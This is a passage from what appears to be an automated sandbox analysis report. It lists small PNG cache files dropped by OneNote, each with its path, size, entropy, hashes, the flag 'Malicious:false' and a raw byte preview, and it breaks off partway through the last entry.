                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000042.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4847
                                                                                                                                                    Entropy (8bit):7.950192613458318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                    MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                    SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                    SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                    SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000044.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000046.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2232
                                                                                                                                                    Entropy (8bit):7.837610270261933
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                    MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                    SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                    SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                    SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19235
                                                                                                                                                    Entropy (8bit):7.944867159042578
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                    MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                    SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                    SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                    SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000048.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5386
                                                                                                                                                    Entropy (8bit):7.943706538857394
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                    MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                    SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                    SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                    SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4081
                                                                                                                                                    Entropy (8bit):7.943373267196131
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                    MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                    SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                    SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                    SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004C.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11332
                                                                                                                                                    Entropy (8bit):7.9324721568775285
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                    MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                    SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                    SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                    SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2270
                                                                                                                                                    Entropy (8bit):7.845368393313232
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                    MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                    SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                    SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                    SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004E.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14553
                                                                                                                                                    Entropy (8bit):7.951135681293377
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                    MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                    SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                    SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                    SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11886
                                                                                                                                                    Entropy (8bit):7.946442244439929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                    MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                    SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                    SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
